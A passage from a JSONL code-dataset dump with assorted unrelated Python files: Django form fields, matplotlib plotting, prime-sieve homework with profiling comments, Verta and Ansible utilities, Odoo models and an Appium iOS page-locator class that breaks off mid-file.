args.o)\n","sub_path":"PhiSpy_tools/tab2seed.py","file_name":"tab2seed.py","file_ext":"py","file_size_in_byte":5152,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"468107136","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /Users/rmartins/Desenvolvimento/Django/Apps/wagtaildemo/smart_selects/form_fields.py\n# Compiled at: 2016-01-06 07:19:32\ntry:\n from django.apps import apps\n get_model = apps.get_model\nexcept ImportError:\n from django.db.models.loading import get_model\n\nfrom django.forms.models import ModelChoiceField, ModelMultipleChoiceField\nfrom django.forms import ChoiceField\nfrom smart_selects.widgets import ChainedSelect, ChainedSelectMultiple\nfrom django.utils.encoding import force_text\nimport traceback\n\nclass ChainedModelChoiceField(ModelChoiceField):\n\n def __init__(self, to_app_name, to_model_name, chained_field, chained_model_field, foreign_key_app_name, foreign_key_model_name, foreign_key_field_name, show_all, auto_choose, manager=None, initial=None, view_name=None, *args, **kwargs):\n defaults = {'widget': ChainedSelect(to_app_name, to_model_name, chained_field, chained_model_field, foreign_key_app_name, foreign_key_model_name, foreign_key_field_name, show_all, auto_choose, manager, view_name)}\n defaults.update(kwargs)\n if 'queryset' not in kwargs:\n queryset = get_model(to_app_name, to_model_name).objects.all()\n super(ChainedModelChoiceField, self).__init__(queryset=queryset, initial=initial, *args, **defaults)\n else:\n super(ChainedModelChoiceField, self).__init__(initial=initial, *args, **defaults)\n\n def _get_choices(self):\n self.widget.queryset = self.queryset\n choices = super(ChainedModelChoiceField, self)._get_choices()\n return choices\n\n choices = property(_get_choices, ChoiceField._set_choices)\n\n\nclass ChainedManyToManyField(ModelMultipleChoiceField):\n\n def __init__(self, to_app_name, to_model_name, chain_field, chained_model_field, foreign_key_app_name, foreign_key_model_name, foreign_key_field_name, auto_choose, manager=None, initial=None, *args, **kwargs):\n defaults = {'widget': ChainedSelectMultiple(to_app_name, to_model_name, chain_field, chained_model_field, foreign_key_app_name, foreign_key_model_name, foreign_key_field_name, auto_choose, manager)}\n defaults.update(kwargs)\n if 'queryset' not in kwargs:\n queryset = get_model(to_app_name, to_model_name).objects.all()\n super(ChainedManyToManyField, self).__init__(queryset=queryset, initial=initial, *args, **defaults)\n else:\n super(ChainedManyToManyField, self).__init__(initial=initial, *args, **defaults)\n\n\nclass GroupedModelSelect(ModelChoiceField):\n\n def __init__(self, queryset, order_field, *args, **kwargs):\n self.order_field = order_field\n super(GroupedModelSelect, self).__init__(queryset, *args, **kwargs)\n\n def _get_choices(self):\n if hasattr(self, '_choices'):\n return self._choices\n group_indexes = {}\n choices = [\n (\n '', self.empty_label or '---------')]\n i = len(choices)\n for item in self.queryset:\n order_field = getattr(item, self.order_field)\n group_index = order_field.pk\n if group_index not in group_indexes:\n group_indexes[group_index] = i\n choices.append([force_text(order_field), []])\n i += 1\n choice_index = group_indexes[group_index]\n choices[choice_index][1].append(self.make_choice(item))\n\n return choices\n\n def make_choice(self, obj):\n return (\n obj.pk, ' ' + self.label_from_instance(obj))\n\n choices = property(_get_choices, ChoiceField._set_choices)","sub_path":"pycfiles/wagtail-smart-selects-1.2.0.tar/form_fields.py","file_name":"form_fields.py","file_ext":"py","file_size_in_byte":3706,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"62505877","text":"# Polygon Figure plotting function\n# Charles Hill\n# 16/05/18\n\nimport numpy as np\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom matplotlib.collections import PolyCollection\n\ndef Gauss_sum(x, params):\n y = np.zeros_like(x)\n for i in range(0, len(params), 3):\n ctr = params[i]\n amp = params[i+1]\n wid = params[i+2]\n y = y + amp * np.exp( -((x - ctr)/wid)**2)\n return y\n\ndef Polygon_figure(Conc,popt,step=0.0001,Con_lim=(0,0.01),G_max=600):\n fig = plt.figure()\n ax = fig.gca(projection='3d')\n idx = np.arange(0,len(Conc),1)\n popt = np.array(popt)\n verts = []\n\n for z, i in zip(Conc,idx):\n x = np.arange(Con_lim[0],Con_lim[1],step)\n y = Gauss_sum(x,popt[i][:])\n verts.append(list(zip(x,y))) # generates a list of (x,y) tuples for each Concnetration\n\n poly = PolyCollection(verts)\n poly.set_alpha(0.7) # Sets the trasnparency of the polygon plots\n ax.add_collection3d(poly, zs=Conc, zdir='y')\n\n ax.set_xlabel('Contrast')\n ax.set_xlim3d(Con_lim[0],Con_lim[1])\n ax.set_ylabel('Concentration')\n ax.set_ylim3d(Conc[0]-10,Conc[-1]+10)\n ax.set_zlabel('Gaussian')\n ax.set_zlim3d(0, G_max)\n\n plt.show()\n\n return","sub_path":"Poly_Fig.py","file_name":"Poly_Fig.py","file_ext":"py","file_size_in_byte":1262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"406802300","text":"\"\"\"\n2. Написать два алгоритма нахождения i-го по счёту простого числа.\nБез использования «Решета Эратосфена»;\nИспользуя алгоритм «Решето Эратосфена»\nПримечание ко всему домашнему заданию: Проанализировать скорость и сложность алгоритмов. Результаты анализа сохранить\nв виде комментариев в файле с кодом.\n\"\"\"\n\n\nimport cProfile\n\norder_num = int(input('input num: '))\na = [n for n in range(2, order_num * 9)]\n\n\ndef simple_nums():\n print('Без использования «Решета Эратосфена»')\n\n b = []\n for i in range(2, len(a)):\n count = 0\n for j in range(2, i):\n if i % j == 0:\n break\n else:\n b.append(i)\n\n print(f'{b}, \\n{b[order_num - 1]}')\n\n\ndef simple_num_ero():\n print('Используя алгоритм «Решето Эратосфена»')\n\n a = [n for n in range(0, order_num * 9)]\n a[1] = 0\n\n i = 2\n while i < len(a):\n if a[i] != 0:\n j = i * 2\n while j < len(a):\n a[j] = 0\n j += i\n i += 1\n\n b = []\n for i in range(len(a)):\n if a[i] != 0:\n b.append(a[i])\n\n print(f'{b}, \\n{b[order_num - 1]}')\n\n# input num: 2345\ncProfile.run('simple_nums()')\n\n# 2379 function calls in 1.524 seconds\n\n# Ordered by: standard name\n#\n# ncalls tottime percall cumtime percall filename: lineno(function)\n# 1 0.000 0.000 1.524 1.524 < string >: 1( < module >)\n# 1 1.523 1.523 1.524 1.524 less04_task02.py: 16(simple_nums)\n# 1 0.000 0.000 1.524 1.524 {built - in method builtins.exec}\n# 1 0.000 0.000 0.000 0.000 {built - in method builtins.len}\n# 2 0.001 0.000 0.001 0.000 {built - in method builtins.print}\n# 2372 0.001 0.000 0.001 0.000 {method 'append' of 'list' objects}\n# 1 0.000 0.000 0.000 0.000 {method'disable'of'_lsprof.Profiler'objects}\n\n\ncProfile.run('simple_num_ero()')\n\n# 76498 function calls in 0.020 seconds\n#\n# Ordered by: standard name\n#\n# ncalls tottime percall cumtime percall filename:lineno(function)\n# 1 0.000 0.000 0.020 0.020 :1()\n# 1 0.013 0.013 0.020 0.020 less04_task02.py:31(simple_num_ero)\n# 1 0.001 0.001 0.001 0.001 less04_task02.py:34()\n# 1 0.000 0.000 0.020 0.020 {built-in method builtins.exec}\n# 74119 0.004 0.000 0.004 0.000 {built-in method builtins.len}\n# 2 0.002 0.001 0.002 0.001 {built-in method builtins.print}\n# 2372 0.000 0.000 0.000 0.000 {method 'append' of 'list' objects}\n# 1 0.000 0.000 0.000 0.000 {method 'disable' of '_lsprof.Profiler' objects}\n","sub_path":"less04_task02.py","file_name":"less04_task02.py","file_ext":"py","file_size_in_byte":3010,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"523000435","text":"#-*- coding: utf-8 -*-\nfrom typing import List\nimport math\n\nimport time\ndef timeit(func):\n def wrapped(*args, **kwargs):\n start = time.time()\n ret = func(*args, **kwargs)\n elapsed = time.time() - start\n print(\"elapsed: %s\" % elapsed)\n return ret\n return wrapped\n\nclass Solution_timeexceeded:\n def rec(self, cur, n):\n if cur == n:\n return 1\n elif cur > n:\n return 0\n else:\n return self.rec(cur+1, n) + self.rec(cur+2, n)\n\n @timeit\n def climbStairs(self, n: int) -> int:\n return self.rec(0, n)\n\nfrom collections import defaultdict\nclass Solution:\n def __init__(self):\n self.cache = defaultdict(int)\n\n def rec(self, cur, n):\n if cur in self.cache: return self.cache[cur]\n if cur == n:\n self.cache[cur] = 2\n return 1\n elif cur > n:\n return 0\n else:\n step1 = self.rec(cur+1, n)\n self.cache[cur+1] = step1\n step2 = self.rec(cur+2, n)\n self.cache[cur+2] = step2\n return step1 + step2\n\n @timeit\n def climbStairs(self, n: int) -> int:\n self.cache = defaultdict(int)\n return self.rec(0, n)\n\nprint(Solution().climbStairs(2))\nprint(Solution().climbStairs(3))\nprint(Solution().climbStairs(5))\nprint(Solution().climbStairs(35))\n\n\n\n","sub_path":"lc/esy/20190818_esy_70_climbing_stairs.py","file_name":"20190818_esy_70_climbing_stairs.py","file_ext":"py","file_size_in_byte":1377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"558381620","text":"#!/usr/bin/env python\n# Copyright 2011 Daniel James\n# Distributed under the Boost Software License, Version 1.0.\n# (See accompanying file LICENSE_1_0.txt or http://www.boost.org/LICENSE_1_0.txt)\n\nimport sys, re, string\n\ntry:\n from urllib.parse import urljoin\nexcept ImportError:\n from urlparse import urljoin\n\ndef htmlencode(text):\n return text.replace('&', '&').replace('<', '<').replace('>', '&rt;')\n\ndef fragment_to_string(fragment):\n \"\"\"\n Convert a minidom document fragment to a string.\n\n Because 'toxml' doesn't work:\n http://bugs.python.org/issue9883\n \"\"\"\n x = ''.join(x.toxml('utf-8').decode('utf-8') for x in fragment.childNodes)\n return re.compile(r' +$', flags = re.M).sub('', x)\n\ndef base_links(node, base_link):\n transform_links(node, lambda x: urljoin(base_link, x))\n\ndef transform_links(node, func):\n transform_links_impl(node, 'a', 'href', func)\n transform_links_impl(node, 'img', 'src', func)\n\ndef transform_links_impl(node, tag_name, attribute, func):\n if node.nodeType == node.ELEMENT_NODE or \\\n node.nodeType == node.DOCUMENT_NODE:\n for x in node.getElementsByTagName(tag_name):\n x.setAttribute(attribute, func(x.getAttribute(attribute)))\n elif node.nodeType == node.DOCUMENT_FRAGMENT_NODE:\n for x in node.childNodes:\n transform_links_impl(x, tag_name, attribute, func)\n\ndef write_template(dst_path, template_path, data):\n file = open(template_path)\n if sys.version_info < (3, 0):\n s = string.Template(file.read().decode('utf-8'))\n else:\n s = string.Template(file.read())\n output = s.substitute(data)\n output = re.compile(r' +$', flags = re.M).sub('', output)\n out = open(dst_path, 'w')\n if sys.version_info < (3, 0):\n out.write(output.encode('utf-8'))\n else:\n out.write(output)\n\ndef write_py_template(dst_path, template_path, data):\n data['emit'] = Emitter()\n exec(open(template_path).read(), {}, data)\n\n out = open(dst_path, 'w')\n if sys.version_info < (3, 0):\n out.write(data['emit'].output.encode('utf-8'))\n else:\n out.write(data['emit'].output)\n\nclass Emitter:\n def __init__(self):\n self.output = ''\n\n def __call__(self, x):\n self.output += x\n","sub_path":"site-tools/boost_site/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":2268,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"315225420","text":"from __future__ import print_function\nimport utils.conf as conf\nimport pandas as pd\nfrom sklearn import preprocessing\n\n\ndef read_data():\n train = pd.read_csv(conf.train_data_path, sep=',')\n test = pd.read_csv(conf.test_data_path, sep=',')\n return train, test\n\n\ndef impute(df):\n df['Upc'] = df.fillna(0)\n df['FinelineNumber'] = df['FinelineNumber'].fillna(-1).astype('int')\n\n\n# Encode categorical variables\ndef encode(df, columns, col=None, dict=None):\n # Auto encoding\n for col_name in columns:\n le = preprocessing.LabelEncoder()\n le.fit(df[col_name])\n df['Encoded_' + col_name] = le.transform(df[col_name])\n\n # encode by dictionary\n if (col is not None) & (dict is not None):\n for key, value in dict.items():\n df[col].replace(key, value, inplace=True)\n df['Encoded_' + col] = df[col]\n\n\ndef clean():\n train, test = read_data()\n impute(train)\n impute(test)\n wd_dict = {'Monday': 1, 'Tuesday': 2, 'Wednesday': 3, 'Thursday': 4, 'Friday': 5, 'Saturday': 6, 'Sunday': 7}\n encode(train, ['DepartmentDescription', 'Upc'], col='Weekday', dict=wd_dict)\n encode(test, ['DepartmentDescription', 'Upc'], col='Weekday', dict=wd_dict)\n train.drop(['Weekday', 'Upc', 'DepartmentDescription'], axis=1, inplace=True)\n test.drop(['Weekday', 'Upc', 'DepartmentDescription'], axis=1, inplace=True)\n return train, test\n","sub_path":"kaggle/modelers/wh/codebase/preprocessing/data_cleaner.py","file_name":"data_cleaner.py","file_ext":"py","file_size_in_byte":1399,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"444407960","text":"# Write a Python program to count number of digits in a number.\n\nn = int(input(\"Please enter a number: \"))\ndivisor = 10\ncount = 1\n\nwhile n % divisor != n:\n count = count + 1\n divisor = divisor * 10\n\nprint(\"Digit(s) in the given number {0} is/are {1}\".format(n, count))\n","sub_path":"assignments-2/printDigitCount.py","file_name":"printDigitCount.py","file_ext":"py","file_size_in_byte":275,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"621165305","text":"# -*- coding: utf-8 -*-\n\nimport warnings\n\nfrom ....._protos.public.monitoring import Alert_pb2 as _AlertService\nfrom ....._internal_utils import _utils, time_utils\nfrom ....._tracking import entity, _Context\nfrom ... import utils\n\n\nclass NotificationChannel(entity._ModelDBEntity):\n \"\"\"\n A notification channel persisted to Verta.\n\n A notification channel directs a triggered alert to propagate a message to\n some destination to notify interested parties.\n\n Attributes\n ----------\n id : int\n ID of this notification channel.\n name : str\n Name of this notification channel.\n\n Examples\n --------\n .. code-block:: python\n\n from verta.operations.monitoring.notification_channel import SlackNotificationChannel\n\n channels = Client().operations.notification_channels\n channel = notification_channels.create(\n \"Slack alerts\",\n SlackNotificationChannel(\"https://hooks.slack.com/services/.../.../......\"),\n )\n\n alert = monitored_entity.alerts.create(\n name=\"MSE\",\n alerter=alerter,\n summary_sample_query=sample_query,\n notification_channels=[channel],\n )\n\n \"\"\"\n\n def __init__(self, conn, conf, msg):\n super(NotificationChannel, self).__init__(\n conn,\n conf,\n _AlertService,\n \"alerts\",\n msg,\n )\n\n def __repr__(self):\n self._refresh_cache()\n msg = self._msg\n return \"\\n\\t\".join(\n (\n \"Notification Channel\",\n \"name: {}\".format(msg.name),\n \"id: {}\".format(msg.id),\n \"created: {}\".format(_utils.timestamp_to_str(msg.created_at_millis)),\n \"updated: {}\".format(_utils.timestamp_to_str(msg.updated_at_millis)),\n \"channel: {}\".format(\n # TODO: use a `channel` property that returns the actual class\n _AlertService.NotificationChannelTypeEnum.NotificationChannelType.Name(\n msg.type\n )\n ),\n )\n )\n\n @property\n def name(self):\n self._refresh_cache()\n\n return self._msg.name\n\n @classmethod\n def _get_proto_by_id(cls, conn, id):\n msg = _AlertService.FindNotificationChannelRequest(\n ids=[int(id)], page_number=1, page_limit=-1,\n )\n endpoint = \"/api/v1/alerts/findNotificationChannel\"\n response = conn.make_proto_request(\"POST\", endpoint, body=msg)\n channels = conn.must_proto_response(response, msg.Response).channels\n if len(channels) > 1:\n warnings.warn(\n \"unexpectedly found multiple alerts with the same name and\"\n \" monitored entity ID\"\n )\n return channels[0]\n\n @classmethod\n def _get_proto_by_name(cls, conn, name, workspace):\n # NOTE: workspace is currently unsupported until https://vertaai.atlassian.net/browse/VR-9792\n msg = _AlertService.FindNotificationChannelRequest(\n names=[name], page_number=1, page_limit=-1,\n )\n endpoint = \"/api/v1/alerts/findNotificationChannel\"\n response = conn.make_proto_request(\"POST\", endpoint, body=msg)\n channels = conn.must_proto_response(response, msg.Response).channels\n if len(channels) > 1:\n warnings.warn(\n \"unexpectedly found multiple alerts with the same name and\"\n \" monitored entity ID\"\n )\n return channels[0]\n\n @classmethod\n def _create_proto_internal(\n cls,\n conn,\n ctx,\n name,\n channel,\n created_at_millis,\n updated_at_millis,\n ):\n msg = _AlertService.CreateNotificationChannelRequest(\n channel=_AlertService.NotificationChannel(\n name=name,\n created_at_millis=created_at_millis,\n updated_at_millis=updated_at_millis,\n type=channel._TYPE,\n )\n )\n if msg.channel.type == _AlertService.NotificationChannelTypeEnum.SLACK:\n msg.channel.slack_webhook.CopyFrom(channel._as_proto())\n else:\n raise ValueError(\n \"unrecognized notification channel type enum value {}\".format(\n msg.alert.alerter_type\n )\n )\n\n endpoint = \"/api/v1/alerts/createNotificationChannel\"\n response = conn.make_proto_request(\"POST\", endpoint, body=msg)\n notification_channel_msg = conn.must_proto_response(\n response,\n _AlertService.NotificationChannel,\n )\n return notification_channel_msg\n\n def _update(self):\n raise NotImplementedError\n\n def delete(self):\n \"\"\"\n Delete this notification channel.\n\n Returns\n -------\n bool\n ``True`` if the delete was successful.\n\n Raises\n ------\n :class:`requests.HTTPError`\n If the delete failed.\n\n \"\"\"\n msg = _AlertService.DeleteNotificationChannelRequest(ids=[self.id])\n endpoint = \"/api/v1/alerts/deleteNotificationChannel\"\n response = self._conn.make_proto_request(\"DELETE\", endpoint, body=msg)\n self._conn.must_response(response)\n return True\n\n\nclass NotificationChannels(object):\n \"\"\"\n Collection object for creating and finding notification channels.\n\n Examples\n --------\n .. code-block:: python\n\n channels = Client().operations.notification_channels\n\n \"\"\"\n\n def __init__(self, conn, conf):\n self._conn = conn\n self._conf = conf\n\n def create(\n self,\n name,\n channel,\n created_at=None,\n updated_at=None,\n ):\n \"\"\"\n Create a new notification channel.\n\n Parameters\n ----------\n name : str\n A unique name for this notification channel.\n channel : :class:`verta.operations.monitoring.notification_channel._NotificationChannel`\n The configuration for this notification channel.\n created_at : datetime.datetime or int, optional\n An override creation time to assign to this channel. Either a\n timezone aware datetime object or unix epoch milliseconds.\n updated_at : datetime.datetime or int, optional\n An override update time to assign to this channel. Either a\n timezone aware datetime object or unix epoch milliseconds.\n\n Returns\n -------\n :class:`NotificationChannel`\n Notification channel.\n\n Examples\n --------\n .. code-block:: python\n\n from verta.operations.monitoring.notification_channel import SlackNotificationChannel\n\n channels = Client().operations.notification_channels\n\n channel = notification_channels.create(\n \"Slack alerts\",\n SlackNotificationChannel(\"https://hooks.slack.com/services/.../.../......\"),\n )\n\n \"\"\"\n ctx = _Context(self._conn, self._conf)\n return NotificationChannel._create(\n self._conn,\n self._conf,\n ctx,\n name=name,\n channel=channel,\n created_at_millis=time_utils.epoch_millis(created_at),\n updated_at_millis=time_utils.epoch_millis(updated_at),\n )\n\n def get(self, name=None, id=None):\n \"\"\"\n Get an existing notification channel.\n\n Either `name` or `id` can be provided but not both.\n\n Parameters\n ----------\n name : str, optional\n Notification channel name.\n id : int, optional\n Notification channel ID.\n\n Returns\n -------\n :class:`NotificationChannel`\n Notification channel.\n\n \"\"\"\n if name and id:\n raise ValueError(\"cannot specify both `name` and `id`\")\n elif name:\n return NotificationChannel._get_by_name(\n self._conn,\n self._conf,\n name,\n None, # TODO: pass workspace instead of None\n )\n elif id:\n return NotificationChannel._get_by_id(self._conn, self._conf, id)\n else:\n raise ValueError(\"must specify either `name` or `id`\")\n\n # TODO: use lazy list and pagination\n # TODO: a proper find\n def list(self):\n \"\"\"\n Return all accesible notification channels.\n\n Returns\n -------\n list of :class:`NotificationChannel`\n Notification channels.\n\n \"\"\"\n msg = _AlertService.FindNotificationChannelRequest(\n page_number=1, page_limit=-1,\n )\n endpoint = \"/api/v1/alerts/findNotificationChannel\"\n response = self._conn.make_proto_request(\"POST\", endpoint, body=msg)\n channels = self._conn.must_proto_response(response, msg.Response).channels\n return [\n NotificationChannel(self._conn, self._conf, channel) for channel in channels\n ]\n\n def delete(self, channels):\n \"\"\"\n Delete the given notification channels in a single request.\n\n Parameters\n ----------\n list of :class:`NotificationChannel`\n Notification channels.\n\n Returns\n -------\n bool\n ``True`` if the delete was successful.\n\n Raises\n ------\n :class:`requests.HTTPError`\n If the delete failed.\n\n \"\"\"\n channel_ids = utils.extract_ids(channels)\n msg = _AlertService.DeleteNotificationChannelRequest(ids=channel_ids)\n endpoint = \"/api/v1/alerts/deleteNotificationChannel\"\n response = self._conn.make_proto_request(\"DELETE\", endpoint, body=msg)\n self._conn.must_response(response)\n return True\n","sub_path":"client/verta/verta/operations/monitoring/notification_channel/_entities/notification_channel.py","file_name":"notification_channel.py","file_ext":"py","file_size_in_byte":9860,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"586578836","text":"#!/usr/bin/env python\n\nfrom subprocess import Popen, PIPE\nimport json\nfrom ansible.module_utils.basic import *\n\nmodule = AnsibleModule(\n argument_spec=dict(\n app=dict(required=True),\n proc=dict(required=True),\n instance_number=dict(required=True),\n )\n)\n\n\ndef main():\n appname = module.params['app']\n procname = module.params['proc']\n instance_no = module.params['instance_number']\n\n try:\n network_info = get_network_info(appname)\n network_id = get_network_id(network_info)\n endpoint_id, container_ip = get_endpoint_info(\n network_info, procname, instance_no)\n module.exit_json(changed=False, network_id=network_id,\n endpoint_id=endpoint_id, recycle_ip=container_ip)\n except Exception as e:\n module.fail_json(msg=str(e))\n\n\ndef get_network_info(appname):\n p = Popen(['docker', 'network', 'inspect', appname],\n stdout=PIPE, stderr=PIPE)\n output, err = p.communicate()\n if p.returncode != 0:\n module.fail_json(msg=err)\n return json.loads(output.rstrip())\n\n\ndef get_network_id(network_info):\n return network_info[0]['Id']\n\n\ndef get_endpoint_info(network_info, procname, instance_no):\n containers_info = network_info[0]['Containers']\n endpoint_id, container_ip = None, None\n for k, v in containers_info.iteritems():\n container_name = v['Name']\n if match_proc_instance(container_name, procname, instance_no):\n endpoint_id = v['EndpointID']\n container_ip = v['IPv4Address'] # the format of ip is 'x.x.x.x/32'\n return endpoint_id, container_ip[0:len(container_ip) - 3]\n\n\n# container name should include procname and instance no\ndef match_proc_instance(name, procname, instance_no):\n instance_filter = '-i' + instance_no + '-'\n return procname in name and instance_filter in name\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"playbooks/roles/libraries/library/inspect_docker_network.py","file_name":"inspect_docker_network.py","file_ext":"py","file_size_in_byte":1914,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"274995848","text":"# -*- coding: utf-8 -*-\n\nfrom odoo import models, fields, api, _,exceptions\n\nclass ResStateCity(models.Model):\n _name = 'res.state.city'\n _description = 'City'\n\n state_id = fields.Many2one('res.country.state',string='State')\n name = fields.Char('City')\n code = fields.Char('City Code')\n area_ids = fields.One2many('res.city.area','city_id',string='Area')\n\nclass ResCityArea(models.Model):\n _name = 'res.city.area'\n _description = 'Area'\n\n city_id = fields.Many2one('res.state.city',string='City')\n name = fields.Char('Area')\n code = fields.Char('Area Code')\n\nclass ResCountryState(models.Model):\n _inherit = 'res.country.state'\n\n city_ids = fields.One2many('res.state.city','state_id',string='City')\n base_city_ids = fields.One2many('res.city','state_id',string='City')\n\n\n","sub_path":"e2yun_addons/odoo12/e2yun_srm_partner_address/models/res_state_city.py","file_name":"res_state_city.py","file_ext":"py","file_size_in_byte":814,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"50263269","text":"import traceback\n\nfrom appium.webdriver.common.mobileby import MobileBy\nfrom library.core.TestLogger import TestLogger\nfrom pages.components.BaseChat import BaseChatPage\nimport time\n\n\n# noinspection PyBroadException\nclass GroupChatPage(BaseChatPage):\n \"\"\"群聊天页面\"\"\"\n ACTIVITY = 'com.cmcc.cmrcs.android.ui.activities.MessageDetailActivity'\n\n __locators = {'': (MobileBy.ACCESSIBILITY_ID, ''),\n '说点什么': (MobileBy.XPATH, '//XCUIElementTypeOther[3]/XCUIElementTypeTextView'),\n '聊天列表': (MobileBy.XPATH, '//XCUIElementTypeApplication[@name=\"和飞信\"]/XCUIElementTypeWindow[1]/XCUIElementTypeOther/XCUIElementTypeOther/XCUIElementTypeOther/XCUIElementTypeOther/XCUIElementTypeOther/XCUIElementTypeOther/XCUIElementTypeOther/XCUIElementTypeTable/XCUIElementTypeCell'),\n '返回': (MobileBy.ACCESSIBILITY_ID, 'back'),\n\n '消息免打扰': (MobileBy.ACCESSIBILITY_ID, 'chat_list_nodisturb'),\n '多方通话': (MobileBy.ACCESSIBILITY_ID, 'cc chat message groupcall norm'),\n '设置': (MobileBy.IOS_PREDICATE, 'name == \"cc chat message site normal\"'),\n '删除群成员确定按钮': (MobileBy.XPATH, '(//XCUIElementTypeButton[@name=\"确定(1)\"])[2]'),\n '添加群成员按钮': (MobileBy.IOS_PREDICATE, 'name CONTAINS \"cc_chat_groupchat_add_normal\"'),\n '删除群成员按钮': (MobileBy.IOS_PREDICATE, 'name CONTAINS \"cc_chat_groupchat_delete_normal\"'),\n '添加群成员确定按钮': (MobileBy.IOS_PREDICATE, 'name CONTAINS \"确定\"'),\n '图片元素数量': (MobileBy.IOS_PREDICATE, 'type==\"XCUIElementTypeImage\"'),\n '群消息免打扰按钮': (MobileBy.XPATH, '//XCUIElementTypeSwitch[@name=\"群消息免打扰\"]'),\n '群名称': (MobileBy.IOS_PREDICATE, 'name == \"群名称\"'),\n '群管理': (MobileBy.IOS_PREDICATE, 'name == \"群管理\"'),\n '解散群': (MobileBy.IOS_PREDICATE, 'name == \"解散群\"'),\n '解散按钮': (MobileBy.IOS_PREDICATE, 'name == \"解散\"'),\n '我的群昵称': (MobileBy.IOS_PREDICATE, 'name == \"我的群昵称\"'),\n '我的群昵称输入框': (MobileBy.XPATH, '//XCUIElementTypeOther/XCUIElementTypeTextField'),\n '修改群名称输入框': (MobileBy.IOS_PREDICATE, 'type == \"XCUIElementTypeTextField\"'),\n '修改群名称完成按钮': (MobileBy.IOS_PREDICATE, 'name == \"完成\"'),\n '选择手机联系人': (MobileBy.IOS_PREDICATE, 'name == \"选择手机联系人\"'),\n '修改群名称清除文本按钮': (MobileBy.IOS_PREDICATE, 'name == \"清除文本\"'),\n\n '14:58': (MobileBy.ID, 'com.chinasofti.rcs:id/tv_time'),\n 'frank': (MobileBy.ID, 'com.chinasofti.rcs:id/text_name'),\n '[呲牙1]': (MobileBy.ID, 'com.chinasofti.rcs:id/tv_message'),\n 'com.chinasofti.rcs:id/svd_head': (MobileBy.ID, 'com.chinasofti.rcs:id/svd_head'),\n '呵呵': (MobileBy.ID, 'com.chinasofti.rcs:id/tv_message'),\n 'mobile0489': (MobileBy.ID, 'com.chinasofti.rcs:id/text_name'),\n 'APP test': (MobileBy.ID, 'com.chinasofti.rcs:id/tv_message'),\n '选择名片': (MobileBy.IOS_PREDICATE, 'name == \"cc_chat_input_ic_business\"'),\n '更多': (MobileBy.ID, 'com.chinasofti.rcs:id/ib_more'),\n '文件发送成功标志': (MobileBy.ID, 'com.chinasofti.rcs:id/img_message_down_file'),\n '选择照片': (MobileBy.IOS_PREDICATE, 'name CONTAINS \"cc_chat_gallery_normal\"'),\n '富媒体拍照': (MobileBy.IOS_PREDICATE, 'name CONTAINS \"cc_chat_camera_normal\"'),\n '发送失败标识': (MobileBy.ID, 'com.chinasofti.rcs:id/imageview_msg_send_failed'),\n '消息图片': (MobileBy.ID, 'com.chinasofti.rcs:id/imageview_msg_image'),\n '消息视频': (MobileBy.ID, 'com.chinasofti.rcs:id/textview_video_time'),\n '收藏': (MobileBy.XPATH, \"//*[contains(@text, '收藏')]\"),\n '转发': (MobileBy.XPATH, \"//*[contains(@text, '转发')]\"),\n '删除': (MobileBy.XPATH, \"//*[contains(@text, '删除')]\"),\n '撤回': (MobileBy.XPATH, \"//*[contains(@text, '撤回')]\"),\n '多选': (MobileBy.XPATH, \"//*[contains(@text, '多选')]\"),\n '复制': (MobileBy.XPATH, \"//*[contains(@text, '复制')]\"),\n '收藏_c': (MobileBy.IOS_PREDICATE, \"name=='收藏'\"),\n '转发_c': (MobileBy.IOS_PREDICATE, \"name=='转发'\"),\n '删除_c': (MobileBy.IOS_PREDICATE, \"name=='删除'\"),\n '撤回_c': (MobileBy.IOS_PREDICATE, \"name=='撤回'\"),\n '多选_c': (MobileBy.IOS_PREDICATE, \"name=='多选'\"),\n '复制_c': (MobileBy.IOS_PREDICATE, \"name=='复制'\"),\n '我知道了': (MobileBy.ID, 'com.chinasofti.rcs:id/dialog_btn_ok'),\n '勾': (MobileBy.ID, 'com.chinasofti.rcs:id/img_message_down_file'),\n '重发按钮': (MobileBy.XPATH, '//XCUIElementTypeButton[@name=\"cc chat again send normal\"]'),\n '重发消息确定': (MobileBy.ID, 'com.chinasofti.rcs:id/btn_ok'),\n '语音消息体': (MobileBy.ID, 'com.chinasofti.rcs:id/img_audio_play_icon'),\n '位置返回': (MobileBy.ID, 'com.chinasofti.rcs:id/location_back_btn'),\n '表情按钮': (MobileBy.IOS_PREDICATE, 'name CONTAINS \"cc_chat_icon_emoji_normal\"'),\n '微笑表情': (MobileBy.IOS_PREDICATE, 'name == \"{awx\"'),\n '窃喜表情': (MobileBy.IOS_PREDICATE, 'name == \"{aqx\"'),\n '流鼻涕表情': (MobileBy.IOS_PREDICATE, 'name == \"{albt\"'),\n '更多加号按钮': (MobileBy.IOS_PREDICATE, 'name CONTAINS \"cc_chat_ic_input_more\"'),\n '更多关闭按钮': (MobileBy.IOS_PREDICATE, 'name CONTAINS \"cc_chat_ic_input_close\"'),\n '语音按钮': (MobileBy.IOS_PREDICATE, 'name contains \"cc chat voice normal\"'),\n '退出按钮': (MobileBy.IOS_PREDICATE, 'name == \"退出\"'),\n '发送按钮': (MobileBy.IOS_PREDICATE, 'name contains 